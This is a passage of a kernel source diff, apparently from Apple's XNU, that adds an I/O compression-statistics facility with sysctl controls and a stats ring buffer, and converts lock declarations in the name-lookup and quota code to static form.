+                       if (per_cpu_compression_buf[cpu] != NULL) {
+                               kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]);
+                               per_cpu_compression_buf[cpu] = NULL;
+                       }
+               }
+               kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf);
+               per_cpu_compression_buf = NULL;
+       }
+
+       if (per_cpu_scratch_buf != NULL) {
+               for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) {
+                       if (per_cpu_scratch_buf[cpu] != NULL) {
+                               kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf[cpu]);
+                               per_cpu_scratch_buf[cpu] = NULL;
+                       }
+               }
+               kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf);
+               per_cpu_scratch_buf = NULL;
+       }
+
+       if (iocs_store_buffer.buffer != NULL) {
+               kheap_free_addr(KHEAP_DEFAULT, iocs_store_buffer.buffer);
+               bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer));
+       }
+
+       iocs_sb_bytes_since_last_mark = 0;
+       iocs_sb_bytes_since_last_notification = 0;
+
+       if (vnpath_scratch_buf != NULL) {
+               kheap_free_addr(KHEAP_DEFAULT, vnpath_scratch_buf);
+               vnpath_scratch_buf = NULL;
+       }
+}
+
+
+static int
+sysctl_io_compression_stats_enable SYSCTL_HANDLER_ARGS
+{
+#pragma unused (arg1, arg2, oidp)
+
+       int error = 0;
+       int enable = 0;
+
+       error = SYSCTL_OUT(req, &io_compression_stats_enable, sizeof(int));
+
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       error = SYSCTL_IN(req, &enable, sizeof(int));
+       if (error) {
+               return error;
+       }
+
+       if (!((enable == 1) || (enable == 0))) {
+               return EINVAL;
+       }
+
+       lck_rw_lock_exclusive(&io_compression_stats_lock);
+       lck_mtx_lock(&iocs_store_buffer_lock);
+       if ((io_compression_stats_enable == 0) && (enable == 1)) {
+               /* Enabling collection of stats. Allocate appropriate buffers */
+               error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_NEW_ALLOC, io_compression_stats_block_size);
+               if (error == 0) {
+                       io_compression_stats_enable = enable;
+                       io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable);
+               } else {
+                       io_compression_stats_dbg("FAILED: setting io_compression_stats_enable to %d", io_compression_stats_enable);
+               }
+       } else if ((io_compression_stats_enable == 1) && (enable == 0)) {
+               io_compression_stats_deallocate_compression_buffers();
+               io_compression_stats_enable = 0;
+               io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable);
+       }
+       lck_mtx_unlock(&iocs_store_buffer_lock);
+       lck_rw_unlock_exclusive(&io_compression_stats_lock);
+
+       return error;
+}
+SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_enable, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_stats_enable, "I", "");
+
+static int
+sysctl_io_compression_block_size SYSCTL_HANDLER_ARGS
+{
+#pragma unused (arg1, arg2, oidp)
+
+       int error = 0;
+       int block_size = io_compression_stats_block_size;
+
+       error = SYSCTL_OUT(req, &block_size, sizeof(int));
+
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       error = SYSCTL_IN(req, &block_size, sizeof(int));
+       if (error) {
+               return error;
+       }
+
+       if (block_size < IO_COMPRESSION_STATS_MIN_BLOCK_SIZE || block_size > IO_COMPRESSION_STATS_MAX_BLOCK_SIZE) {
+               return EINVAL;
+       }
+
+       lck_rw_lock_exclusive(&io_compression_stats_lock);
+
+       if (io_compression_stats_block_size != block_size) {
+               if (io_compression_stats_enable == 1) {
+                       /* IO compression stats is enabled, rellocate buffers. */
+                       error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_RESIZE, block_size);
+                       if (error == 0) {
+                               io_compression_stats_block_size = block_size;
+                               io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size);
+                       } else {
+                               /* Failed to allocate buffers, disable IO compression stats */
+                               io_compression_stats_enable = 0;
+                               io_compression_stats_dbg("Failed: setting io_compression_stats_block_size to %d", io_compression_stats_block_size);
+                       }
+               } else {
+                       /* IO compression stats is disabled, only set the io_compression_stats_block_size */
+                       io_compression_stats_block_size = block_size;
+                       io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size);
+               }
+       }
+       lck_rw_unlock_exclusive(&io_compression_stats_lock);
+
+
+       return error;
+}
+SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_block_size, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_block_size, "I", "");
+
+
+static int32_t
+iocs_compress_block(uint8_t *block_ptr, uint32_t block_size)
+{
+       disable_preemption();
+
+       uint32_t current_cpu = cpu_number();
+       if (!(current_cpu < io_compression_stats_cpu_count)) {
+               enable_preemption();
+               return -1;
+       }
+
+       lz4_encode_scratch_t *scratch_buf = per_cpu_scratch_buf[current_cpu];
+       uint8_t *dest_buf = per_cpu_compression_buf[current_cpu];
+
+       int compressed_block_size = (int) lz4raw_encode_buffer(dest_buf, block_size,
+           block_ptr, block_size, (lz4_hash_entry_t *) scratch_buf);
+
+       enable_preemption();
+
+       return compressed_block_size;
+}
+/*
+ * Compress buf in chunks of io_compression_stats_block_size
+ */
+static uint32_t
+iocs_compress_buffer(vnode_t vn, uint8_t *buf_ptr, uint32_t buf_size)
+{
+       uint32_t offset;
+       uint32_t compressed_size = 0;
+       int block_size = io_compression_stats_block_size;
+       int block_stats_scaling_factor = block_size / IOCS_BLOCK_NUM_SIZE_BUCKETS;
+
+       for (offset = 0; offset < buf_size; offset += block_size) {
+               int current_block_size = min(block_size, buf_size - offset);
+               int current_compressed_block_size = iocs_compress_block(buf_ptr + offset, current_block_size);
+
+               if (current_compressed_block_size == 0) {
+                       compressed_size += current_block_size;
+                       vnode_updateiocompressionblockstats(vn, current_block_size / block_stats_scaling_factor);
+               } else if (current_compressed_block_size != -1) {
+                       compressed_size += current_compressed_block_size;
+                       vnode_updateiocompressionblockstats(vn, current_compressed_block_size / block_stats_scaling_factor);
+               }
+       }
+
+       return compressed_size;
+}
+
+static uint32_t
+log2down(uint32_t x)
+{
+       return 31 - __builtin_clz(x);
+}
+
+/*
+ * Once we get the IO compression stats for the entire buffer, we update buffer_size_compressibility_dist,
+ * which helps us observe distribution across various io sizes and compression factors.
+ * The goal of next two functions is to get the index in this buffer_size_compressibility_dist table.
+ */
+
+/*
+ * Maps IO size to a bucket between 0 - IO_COMPRESSION_STATS_MAX_SIZE_BUCKET
+ * for size < 4096 returns 0 and size > 1MB returns IO_COMPRESSION_STATS_MAX_SIZE_BUCKET (9).
+ * For IO sizes in-between we arrive at the index based on log2 function.
+ * sizes 4097 - 8192 => index = 1,
+ * sizes 8193 - 16384 => index = 2, and so on
+ */
+#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN   4096
+#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX   (1024 * 1024)
+static uint32_t
+get_buffer_size_bucket(uint32_t size)
+{
+       if (size <= SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN) {
+               return 0;
+       }
+       if (size > SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX) {
+               return IOCS_BUFFER_MAX_BUCKET;
+       }
+#define IOCS_INDEX_MAP_OFFSET 11
+       return log2down(size - 1) - IOCS_INDEX_MAP_OFFSET;
+}
+
+/*
+ * Maps compression factor to a bucket between 0 - IO_COMPRESSION_STATS_MAX_COMPRESSION_BUCKET
+ */
+static uint32_t
+get_buffer_compressibility_bucket(uint32_t uncompressed_size, uint32_t compressed_size)
+{
+       int saved_space_pc = (uncompressed_size - compressed_size) * 100 / uncompressed_size;
+
+       if (saved_space_pc < 0) {
+               saved_space_pc = 0;
+       }
+
+       /* saved_space_pc lies bw 0 - 100. log2(saved_space_pc) lies bw 0 - 6 */
+       return log2down(saved_space_pc);
+}
+
+void
+io_compression_stats(buf_t bp)
+{
+       uint8_t *buf_ptr = NULL;
+       int bflags = bp->b_flags;
+       uint32_t compressed_size = 0;
+       uint32_t buf_cnt = buf_count(bp);
+       uint64_t duration = 0;
+       caddr_t vaddr = NULL;
+       vnode_t vn = buf_vnode(bp);
+       int err = 0;
+
+       if ((io_compression_stats_enable != 1) || (bflags & B_READ) || (buf_cnt <= 0)) {
+               return;
+       }
+
+       if (!lck_rw_try_lock_shared(&io_compression_stats_lock)) {
+               /* sysctl modifying IO compression stats parameters is in progress.
+                *  Don't block, since malloc might be in progress. */
+               return;
+       }
+       /* re-check io_compression_stats_enable with lock */
+       if (io_compression_stats_enable != 1) {
+               goto out;
+       }
+
+       err = buf_map(bp, &vaddr);
+       if (!err) {
+               buf_ptr = (uint8_t *) vaddr;
+       }
+
+       if (buf_ptr != NULL) {
+               int64_t start = mach_absolute_time();
+               compressed_size = iocs_compress_buffer(vn, buf_ptr, buf_cnt);
+               absolutetime_to_nanoseconds(mach_absolute_time() - start, &duration);
+
+               if (compressed_size != 0) {
+                       vnode_updateiocompressionbufferstats(vn, buf_cnt, compressed_size,
+                           get_buffer_size_bucket(buf_cnt),
+                           get_buffer_compressibility_bucket(buf_cnt, compressed_size));
+               }
+       }
+
+       KDBG_RELEASE(FSDBG_CODE(DBG_VFS, DBG_VFS_IO_COMPRESSION_STATS) | DBG_FUNC_NONE,
+           duration, io_compression_stats_block_size, compressed_size, buf_cnt, 0);
+
+out:
+       lck_rw_unlock_shared(&io_compression_stats_lock);
+       if (buf_ptr != NULL) {
+               buf_unmap(bp);
+       }
+}
+
+static void
+iocs_notify_user(void)
+{
+       mach_port_t user_port = MACH_PORT_NULL;
+       kern_return_t kr = host_get_iocompressionstats_port(host_priv_self(), &user_port);
+       if ((kr != KERN_SUCCESS) || !IPC_PORT_VALID(user_port)) {
+               return;
+       }
+       iocompressionstats_notification(user_port, 0);
+       ipc_port_release_send(user_port);
+}
+static void
+construct_iocs_sbe_from_vnode(struct vnode *vp, struct iocs_store_buffer_entry *iocs_sbe)
+{
+       int path_len = MAXPATHLEN;
+
+       vn_getpath(vp, vnpath_scratch_buf, &path_len);
+       /*
+        * Total path length is path_len, we can copy out IOCS_SBE_PATH_LEN bytes. We are interested
+        * in first segment of the path to try and figure out the process writing to the file, and we are
+        * interested in the last segment to figure out extention. So, in cases where
+        * IOCS_SBE_PATH_LEN < path_len, lets copy out first IOCS_PATH_START_BYTES_TO_COPY bytes and
+        * last IOCS_PATH_END_BYTES_TO_COPY (last segment includes the null character).
+        */
+       if (path_len > IOCS_SBE_PATH_LEN) {
+               strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_PATH_START_BYTES_TO_COPY);
+               strncpy(iocs_sbe->path_name + IOCS_PATH_START_BYTES_TO_COPY,
+                   vnpath_scratch_buf + path_len - IOCS_PATH_END_BYTES_TO_COPY,
+                   IOCS_PATH_END_BYTES_TO_COPY);
+       } else {
+               strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_SBE_PATH_LEN);
+       }
+       memcpy(&iocs_sbe->iocs, vp->io_compression_stats, sizeof(struct io_compression_stats));
+}
+void
+vnode_iocs_record_and_free(struct vnode *vp)
+{
+       int notify = 0;
+       struct iocs_store_buffer_entry *iocs_sbe = NULL;
+
+       if (!lck_mtx_try_lock(&iocs_store_buffer_lock)) {
+               goto out;
+       }
+
+       if (iocs_store_buffer.buffer == NULL) {
+               goto release;
+       }
+
+       assert(iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) <= IOCS_STORE_BUFFER_SIZE);
+
+       iocs_sbe = (struct iocs_store_buffer_entry *)(iocs_store_buffer.buffer + iocs_store_buffer.current_position);
+
+       construct_iocs_sbe_from_vnode(vp, iocs_sbe);
+
+       iocs_store_buffer.current_position += sizeof(struct iocs_store_buffer_entry);
+
+       if (iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) > IOCS_STORE_BUFFER_SIZE) {
+               /* We've reached end of the buffer, move back to the top */
+               iocs_store_buffer.current_position = 0;
+       }
+
+       iocs_sb_bytes_since_last_mark += sizeof(struct iocs_store_buffer_entry);
+       iocs_sb_bytes_since_last_notification += sizeof(struct iocs_store_buffer_entry);
+
+       if ((iocs_sb_bytes_since_last_mark > IOCS_STORE_BUFFER_NOTIFY_AT) &&
+           (iocs_sb_bytes_since_last_notification > IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL)) {
+               notify = 1;
+               iocs_sb_bytes_since_last_notification = 0;
+       }
+
+release:
+       lck_mtx_unlock(&iocs_store_buffer_lock);
+out:
+       /* We need to free io_compression_stats whether or not we were able to record it */
+       bzero(vp->io_compression_stats, sizeof(struct io_compression_stats));
+       zfree(io_compression_stats_zone, vp->io_compression_stats);
+       vp->io_compression_stats = NULL;
+       if (notify) {
+               iocs_notify_user();
+       }
+}
+
+struct vnode_iocs_context {
+       struct sysctl_req *addr;
+       int current_ptr;
+};
+
+static int
+vnode_iocs_callback(struct vnode *vp, void *vctx)
+{
+       struct vnode_iocs_context *ctx = vctx;
+       struct sysctl_req *req = ctx->addr;
+       int current_ptr = ctx->current_ptr;
+
+       if (current_ptr + sizeof(struct iocs_store_buffer_entry) < req->oldlen) {
+               if (vp->io_compression_stats != NULL) {
+                       construct_iocs_sbe_from_vnode(vp, (struct iocs_store_buffer_entry *) (req->oldptr + current_ptr));
+                       current_ptr += sizeof(struct iocs_store_buffer_entry);
+               }
+       } else {
+               return VNODE_RETURNED_DONE;
+       }
+       ctx->current_ptr = current_ptr;
+
+       return VNODE_RETURNED;
+}
+
+static int
+vfs_iocs_callback(mount_t mp, void *arg)
+{
+       if (mp->mnt_flag & MNT_LOCAL) {
+               vnode_iterate(mp, VNODE_ITERATE_ALL, vnode_iocs_callback, arg);
+       }
+
+       return VFS_RETURNED;
+}
+
+extern long numvnodes;
+
+static int
+sysctl_io_compression_dump_stats SYSCTL_HANDLER_ARGS
+{
+#pragma unused (arg1, arg2, oidp)
+
+       int32_t error = 0;
+       uint32_t inp_flag = 0;
+       uint32_t ret_len;
+
+       if (io_compression_stats_enable == 0) {
+               error = EINVAL;
+               goto out;
+       }
+
+       if ((req->newptr != USER_ADDR_NULL) && (req->newlen == sizeof(uint32_t))) {
+               error = SYSCTL_IN(req, &inp_flag, sizeof(uint32_t));
+               if (error) {
+                       goto out;
+               }
+               switch (inp_flag) {
+               case IOCS_SYSCTL_LIVE:
+               case IOCS_SYSCTL_STORE_BUFFER_RD_ONLY:
+               case IOCS_SYSCTL_STORE_BUFFER_MARK:
+                       break;
+               default:
+                       error = EINVAL;
+                       goto out;
+               }
+       } else {
+               error = EINVAL;
+               goto out;
+       }
+
+       if (req->oldptr == USER_ADDR_NULL) {
+               /* Query to figure out size of the buffer */
+               if (inp_flag & IOCS_SYSCTL_LIVE) {
+                       req->oldidx = numvnodes * sizeof(struct iocs_store_buffer_entry);
+               } else {
+                       /* Buffer size for archived case, let's keep it
+                        * simple and return IOCS store buffer size */
+                       req->oldidx = IOCS_STORE_BUFFER_SIZE;
+               }
+               goto out;
+       }
+
+       if (inp_flag & IOCS_SYSCTL_LIVE) {
+               struct vnode_iocs_context ctx;
+
+               bzero(&ctx, sizeof(struct vnode_iocs_context));
+               ctx.addr = req;
+               vfs_iterate(0, vfs_iocs_callback, &ctx);
+               req->oldidx = ctx.current_ptr;
+               goto out;
+       }
+
+       /* reading from store buffer */
+       lck_mtx_lock(&iocs_store_buffer_lock);
+
+       if (iocs_store_buffer.buffer == NULL) {
+               error = EINVAL;
+               goto release;
+       }
+       if (iocs_sb_bytes_since_last_mark == 0) {
+               req->oldidx = 0;
+               goto release;
+       }
+
+       int expected_size = 0;
+       /* Dry run to figure out amount of space required to copy out the
+        * iocs_store_buffer.buffer */
+       if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) {
+               expected_size = iocs_store_buffer.current_position - iocs_store_buffer.marked_point;
+       } else {
+               expected_size = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point;
+               expected_size += iocs_store_buffer.current_position;
+       }
+
+       if (req->oldlen < expected_size) {
+               error = ENOMEM;
+               req->oldidx = 0;
+               goto release;
+       }
+
+       if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) {
+               error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point,
+                   req->oldptr,
+                   iocs_store_buffer.current_position - iocs_store_buffer.marked_point);
+               if (error) {
+                       req->oldidx = 0;
+                       goto release;
+               }
+               ret_len = iocs_store_buffer.current_position - iocs_store_buffer.marked_point;
+       } else {
+               error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point,
+                   req->oldptr,
+                   IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point);
+               if (error) {
+                       req->oldidx = 0;
+                       goto release;
+               }
+               ret_len = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point;
+
+               error = copyout(iocs_store_buffer.buffer,
+                   req->oldptr + ret_len,
+                   iocs_store_buffer.current_position);
+               if (error) {
+                       req->oldidx = 0;
+                       goto release;
+               }
+               ret_len += iocs_store_buffer.current_position;
+       }
+
+       req->oldidx = ret_len;
+       if ((ret_len != 0) && (inp_flag & IOCS_SYSCTL_STORE_BUFFER_MARK)) {
+               iocs_sb_bytes_since_last_mark = 0;
+               iocs_store_buffer.marked_point = iocs_store_buffer.current_position;
+       }
+release:
+       lck_mtx_unlock(&iocs_store_buffer_lock);
+
+out:
+       return error;
+}
+SYSCTL_PROC(_vfs, OID_AUTO, io_compression_dump_stats, CTLFLAG_WR | CTLTYPE_NODE, 0, 0, sysctl_io_compression_dump_stats, "-", "");
+
+errno_t
+vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket)
+{
+       if (vp == NULL) {
+               return EINVAL;
+       }
+
+       if (size_bucket >= IOCS_BLOCK_NUM_SIZE_BUCKETS) {
+               return EINVAL;
+       }
+
+       if (vp->io_compression_stats == NULL) {
+               io_compression_stats_t iocs = (io_compression_stats_t)zalloc_flags(io_compression_stats_zone, Z_ZERO);
+               if (iocs == NULL) {
+                       return ENOMEM;
+               }
+               vnode_lock_spin(vp);
+               /* Re-check with lock */
+               if (vp->io_compression_stats == NULL) {
+                       vp->io_compression_stats = iocs;
+               } else {
+                       zfree(io_compression_stats_zone, iocs);
+               }
+               vnode_unlock(vp);
+       }
+       OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->block_compressed_size_dist[size_bucket]);
+
+       return 0;
+}
+errno_t
+vnode_updateiocompressionbufferstats(__unused vnode_t vp, __unused uint64_t uncompressed_size, __unused uint64_t compressed_size, __unused uint32_t size_bucket, __unused uint32_t compression_bucket)
+{
+       if (vp == NULL) {
+               return EINVAL;
+       }
+
+       /* vnode_updateiocompressionblockstats will always be called before vnode_updateiocompressionbufferstats.
+        * Hence vp->io_compression_stats should already be allocated */
+       if (vp->io_compression_stats == NULL) {
+               return EINVAL;
+       }
+
+       if ((size_bucket >= IOCS_BUFFER_NUM_SIZE_BUCKETS) || (compression_bucket >= IOCS_BUFFER_NUM_COMPRESSION_BUCKETS)) {
+               return EINVAL;
+       }
+
+       OSAddAtomic64(uncompressed_size, &vp->io_compression_stats->uncompressed_size);
+       OSAddAtomic64(compressed_size, &vp->io_compression_stats->compressed_size);
+
+       OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->buffer_size_compression_dist[size_bucket][compression_bucket]);
+
+       return 0;
+}
diff --git a/bsd/vfs/vfs_io_compression_stats.h b/bsd/vfs/vfs_io_compression_stats.h
new file mode 100644 (file)
index 0000000..decec8d
--- /dev/null
@@ -0,0 +1,65 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_
+#define _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_
+
+#include <sys/buf_internal.h>
+#include <sys/vnode.h>
+
+void io_compression_stats_init(void);
+void io_compression_stats(buf_t bp);
+
+#define IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE (4 * 1024)
+#define IO_COMPRESSION_STATS_MIN_BLOCK_SIZE (4 * 1024)
+#define IO_COMPRESSION_STATS_MAX_BLOCK_SIZE (1024 * 1024 * 1024)
+
+#if IO_COMPRESSION_STATS_DEBUG
+#define io_compression_stats_dbg(fmt, ...) \
+       printf("%s: " fmt "\n", __func__, ## __VA_ARGS__)
+#else
+#define io_compression_stats_dbg(fmt, ...)
+#endif
+
+/* iocs_store_buffer: Buffer that captures the stats of vnode being reclaimed */
+struct iocs_store_buffer {
+       void*                   buffer;
+       uint32_t                current_position;
+       uint32_t                marked_point;
+};
+
+#define IOCS_STORE_BUFFER_NUM_SLOTS 10000
+#define IOCS_STORE_BUFFER_SIZE (IOCS_STORE_BUFFER_NUM_SLOTS * (sizeof(struct iocs_store_buffer_entry)))
+
+/* Notify user when the buffer is 80% full */
+#define IOCS_STORE_BUFFER_NOTIFY_AT ((IOCS_STORE_BUFFER_SIZE * 8) / 10)
+
+/* Wait for the buffer to be 10% more full before notifying again */
+#define IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL (IOCS_STORE_BUFFER_SIZE / 10)
+
+#endif
index 6a170010522207512d6300fbd254ee25271a790d..efe27e3e06ea347fc4c73491d9f989dd994c438a 100644 (file)
@@ -125,7 +125,7 @@ static int              lookup_handle_emptyname(struct nameidata *ndp, struct co
 static int              lookup_handle_rsrc_fork(vnode_t dp, struct nameidata *ndp, struct componentname *cnp, int wantparent, vfs_context_t ctx);
 #endif
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 /*
  * Convert a pathname into a pointer to a locked inode.
@@ -356,7 +356,7 @@ retry_copy:
         * determine the starting point for the translation.
         */
        proc_dirs_lock_shared(p);
-       lck_rw_lock_shared(rootvnode_rw_lock);
+       lck_rw_lock_shared(&rootvnode_rw_lock);
 
        if (!(fdp->fd_flags & FD_CHROOT)) {
                ndp->ni_rootdir = rootvnode;
@@ -371,7 +371,7 @@ retry_copy:
                        /* This should be a panic */
                        printf("fdp->fd_rdir is not set\n");
                }
-               lck_rw_unlock_shared(rootvnode_rw_lock);
+               lck_rw_unlock_shared(&rootvnode_rw_lock);
                proc_dirs_unlock_shared(p);
                error = ENOENT;
                goto error_out;
@@ -397,7 +397,7 @@ retry_copy:
 
        if (dp == NULLVP || (dp->v_lflag & VL_DEAD)) {
                dp = NULLVP;
-               lck_rw_unlock_shared(rootvnode_rw_lock);
+               lck_rw_unlock_shared(&rootvnode_rw_lock);
                proc_dirs_unlock_shared(p);
                error = ENOENT;
                goto error_out;
@@ -440,7 +440,7 @@ retry_copy:
        }
 
        /* Now that we have our usecount, release the locks */
-       lck_rw_unlock_shared(rootvnode_rw_lock);
+       lck_rw_unlock_shared(&rootvnode_rw_lock);
        proc_dirs_unlock_shared(p);
 
        ndp->ni_dvp = NULLVP;
@@ -477,7 +477,7 @@ retry_copy:
                                startdir_with_usecount = NULLVP;
                        }
                        if (rootdir_with_usecount) {
-                               lck_rw_lock_shared(rootvnode_rw_lock);
+                               lck_rw_lock_shared(&rootvnode_rw_lock);
                                if (rootdir_with_usecount == rootvnode) {
                                        old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed);
                                        if (old_count < 2) {
@@ -489,7 +489,7 @@ retry_copy:
                                        }
                                        rootdir_with_usecount = NULLVP;
                                }
-                               lck_rw_unlock_shared(rootvnode_rw_lock);
+                               lck_rw_unlock_shared(&rootvnode_rw_lock);
                                if (rootdir_with_usecount) {
                                        vnode_rele(rootdir_with_usecount);
                                        rootdir_with_usecount = NULLVP;
@@ -537,7 +537,7 @@ error_out:
                startdir_with_usecount = NULLVP;
        }
        if (rootdir_with_usecount) {
-               lck_rw_lock_shared(rootvnode_rw_lock);
+               lck_rw_lock_shared(&rootvnode_rw_lock);
                if (rootdir_with_usecount == rootvnode) {
                        old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed);
                        if (old_count < 2) {
@@ -547,9 +547,9 @@ error_out:
                                panic("(4) Unexpected pre-decrement value (%d) of usecount for rootvnode %p",
                                    old_count, rootdir_with_usecount);
                        }
-                       lck_rw_unlock_shared(rootvnode_rw_lock);
+                       lck_rw_unlock_shared(&rootvnode_rw_lock);
                } else {
-                       lck_rw_unlock_shared(rootvnode_rw_lock);
+                       lck_rw_unlock_shared(&rootvnode_rw_lock);
                        vnode_rele(rootdir_with_usecount);
                }
                rootdir_with_usecount = NULLVP;
index b58c75e27d7c37db1f7660011013cea73ed08ab2..6fd297c9d41d3779777cef310684f81dc5f8f41e 100644 (file)
 
 
 /* vars for quota file lock */
-lck_grp_t       * qf_lck_grp;
-lck_grp_attr_t  * qf_lck_grp_attr;
-lck_attr_t      * qf_lck_attr;
+static LCK_GRP_DECLARE(qf_lck_grp, "quota file");
 
 /* vars for quota list lock */
-lck_grp_t       * quota_list_lck_grp;
-lck_grp_attr_t  * quota_list_lck_grp_attr;
-lck_attr_t      * quota_list_lck_attr;
-lck_mtx_t       * quota_list_mtx_lock;
+static LCK_GRP_DECLARE(quota_list_lck_grp, "quuota list");
+static LCK_MTX_DECLARE(quota_list_mtx_lock, &quota_list_lck_grp);
 
 /* Routines to lock and unlock the quota global data */
 static int dq_list_lock(void);
@@ -131,41 +127,6 @@ static int  qf_ref(struct quotafile *);
 static void qf_rele(struct quotafile *);
 
 
-/*
- * Initialize locks for the quota system.
- */
-void
-dqinit(void)
-{
-       /*
-        * Allocate quota list lock group attribute and group
-        */
-       quota_list_lck_grp_attr = lck_grp_attr_alloc_init();
-       quota_list_lck_grp = lck_grp_alloc_init("quota list", quota_list_lck_grp_attr);
-
-       /*
-        * Allocate qouta list lock attribute
-        */
-       quota_list_lck_attr = lck_attr_alloc_init();
-
-       /*
-        * Allocate quota list lock
-        */
-       quota_list_mtx_lock = lck_mtx_alloc_init(quota_list_lck_grp, quota_list_lck_attr);
-
-
-       /*
-        * allocate quota file lock group attribute and group
-        */
-       qf_lck_grp_attr = lck_grp_attr_alloc_init();
-       qf_lck_grp = lck_grp_alloc_init("quota file", qf_lck_grp_attr);
-
-       /*
-        * Allocate quota file lock attribute
-        */
-       qf_lck_attr = lck_attr_alloc_init();
-}
-
 /*
  * Report whether dqhashinit has been run.
  */
@@ -199,7 +160,7 @@ static volatile int dq_list_lock_cnt = 0;
 static int
 dq_list_lock(void)
 {
-       lck_mtx_lock(quota_list_mtx_lock);
+       lck_mtx_lock(&quota_list_mtx_lock);
        return ++dq_list_lock_cnt;
 }
 
@@ -218,7 +179,7 @@ dq_list_lock_val(void)
 void
 dq_list_unlock(void)
 {
-       lck_mtx_unlock(quota_list_mtx_lock);
+       lck_mtx_unlock(&quota_list_mtx_lock);
 }
 
 
@@ -230,7 +191,7 @@ dq_lock_internal(struct dquot *dq)
 {
        while (dq->dq_lflags & DQ_LLOCK) {
                dq->dq_lflags |= DQ_LWANT;
-               msleep(&dq->dq_lflags, quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL);
+               msleep(&dq->dq_lflags, &quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL);
        }
        dq->dq_lflags |= DQ_LLOCK;
 }
@@ -253,21 +214,21 @@ dq_unlock_internal(struct dquot *dq)
 void
 dqlock(struct dquot *dq)
 {
-       lck_mtx_lock(quota_list_mtx_lock);
+       lck_mtx_lock(&quota_list_mtx_lock);
 
        dq_lock_internal(dq);
 
-       lck_mtx_unlock(quota_list_mtx_lock);
+       lck_mtx_unlock(&quota_list_mtx_lock);
 }
 
 void
 dqunlock(struct dquot *dq)
 {
-       lck_mtx_lock(quota_list_mtx_lock);
+       lck_mtx_lock(&quota_list_mtx_lock);
 
        dq_unlock_internal(dq);
 
-       lck_mtx_unlock(quota_list_mtx_lock);
+       lck_mtx_unlock(&quota_list_mtx_lock);
 }
 
 
@@ -288,7 +249,7 @@ qf_get(struct quotafile *qfp, int type)
                        }
                        if ((qfp->qf_qflags & QTF_CLOSING)) {
                                qfp->qf_qflags |= QTF_WANTED;
-                               msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL);
+                               msleep(&qfp->qf_qflags, &quota_list_mtx_lock, PVFS, "qf_get", NULL);
                        }
                }
                if (qfp->qf_vp != NULLVP) {
@@ -308,7 +269,7 @@ qf_get(struct quotafile *qfp, int type)
 
                while ((qfp->qf_qflags & QTF_OPENING) || qfp->qf_refcnt) {
                        qfp->qf_qflags |= QTF_WANTED;
-                       msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL);
